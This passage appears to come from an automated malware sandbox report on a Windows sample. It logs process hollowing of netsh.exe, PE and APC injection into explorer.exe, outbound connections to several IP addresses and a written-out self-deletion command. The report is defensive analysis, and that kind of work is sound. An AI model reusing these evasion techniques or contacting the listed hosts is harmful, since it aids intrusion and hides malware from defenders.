          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BEA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C2E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03C3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03BFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 10_2_03B9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\vBugmobiJh.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.128.23.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 154.80.226.18 80
          Source: C:\Windows\explorer.exeNetwork Connect: 94.73.146.42 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\vBugmobiJh.exeMemory written: C:\Users\user\Desktop\vBugmobiJh.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\vBugmobiJh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\vBugmobiJh.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\vBugmobiJh.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\vBugmobiJh.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\vBugmobiJh.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\vBugmobiJh.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: F90000
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess created: C:\Users\user\Desktop\vBugmobiJh.exe C:\Users\user\Desktop\vBugmobiJh.exe
          Source: C:\Users\user\Desktop\vBugmobiJh.exeProcess created: C:\Users\user\Desktop\vBugmobiJh.exe C:\Users\user\Desktop\vBugmobiJh.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\vBugmobiJh.exe'
          Source: explorer.exe, 00000007.00000000.231730781.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000007.00000002.476407848.0000000001980000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.479167679.00000000060D0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000002.476407848.0000000001980000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.479167679.00000000060D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.476407848.0000000001980000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.479167679.00000000060D0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.476407848.0000000001980000.00000002.00000001.sdmp, netsh.exe, 0000000A.00000002.479167679.00000000060D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Users\user\Desktop\vBugmobiJh.exe VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\vBugmobiJh.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
